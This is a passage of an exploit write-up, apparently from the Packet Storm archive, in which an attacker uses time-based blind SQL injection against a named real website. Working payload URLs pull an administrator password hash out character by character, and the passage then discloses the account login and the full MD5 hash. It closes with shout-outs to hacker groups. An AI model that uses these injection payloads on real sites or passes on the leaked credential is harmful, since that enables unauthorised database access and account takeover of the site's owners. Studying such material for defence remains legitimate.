http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

15-ci simvol: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

16-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

17-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

18--ci simvol: 0


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

19-cu simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




================================================

20-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

21-ci simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

22-c simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================


23-cu simvol: 6

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

24-cu simvol: e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

25-ci simvol: f


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

26-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

27-ci simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

28-ci simvol: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

29-cu simvol: 2


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

30-cu simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

31-ci simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

32-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5

================================================

Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
Qirilmadi hash:( Blya beddiydie basdan ayaga:*(

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


===========================================================



Enjoy)


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep













Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close